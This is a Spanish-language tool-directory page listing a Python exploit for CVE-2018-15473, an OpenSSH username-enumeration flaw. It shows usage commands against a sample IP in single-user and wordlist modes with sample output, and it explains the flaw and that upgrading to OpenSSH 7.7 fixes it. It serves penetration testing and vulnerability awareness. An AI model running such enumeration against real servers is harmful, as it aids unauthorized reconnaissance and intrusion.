Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2018-15473 — # Exploit en Python para CVE-2018-15473 que permite la enumeración de nombres de usuario en OpenSSH mediante un oráculo de respuesta de autenticación, con modos de usuario único y lista de palabras. | Kitploit
Herramientas/GitHubGitHub/0xrobiul/cve-2018-15473
ReconocimientoAnálisis de VulnerabilidadesExplotaciónRecopilación de InformaciónSeguridad de RedesPruebas de Penetración
GitHub0xrobiul/cve-2018-15473

CVE-2018-15473

# Exploit en Python para CVE-2018-15473 que permite la enumeración de nombres de usuario en OpenSSH mediante un oráculo de respuesta de autenticación, con modos de usuario único y lista de palabras.

Ver Repositorio
1hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2018-15473

SSH-Username-Enumeration-Exploit (OpenSSH 2.3 < 7.7)

Versión editada del exploit original: https://www.exploit-db.com/exploits/45233

  • Convertido a Python3
  • Añadida opción de lista de nombres de usuario

Cómo Ejecutar

root@kitploit:~

#Install the requirements:

foo@bar:~$ pip3 install -r requirements.txt

root@kitploit:~

#For single username:

foo@bar:~$ ./Exploit.py 192.168.1.20 -u root

[+] root is a valid username

root@kitploit:~

#For multiple username:

foo@bar:~$ ./Exploit.py 192.168.1.20 -w username.txt

[+] root is a valid username

[-] mysql is an invalid username

[-] mike is an invalid username

[-] foo is an invalid username

[-] bar is an invalid username

Valid Users: 

root

root@kitploit:~

#For more option:

foo@bar:~$ ./Exploit.py -h

Acerca de la Vulnerabilidad:

El sistema responde de manera diferente a los intentos de autenticación válidos e inválidos. Un usuario remoto puede enviar solicitudes especialmente diseñadas para determinar nombres de usuario válidos en el sistema objetivo. Así, un usuario remoto puede determinar nombres de usuario válidos en el sistema objetivo.

Solución:

El servidor OpenSSH debe actualizarse a la versión 7.7 o superior.

Descargar herramienta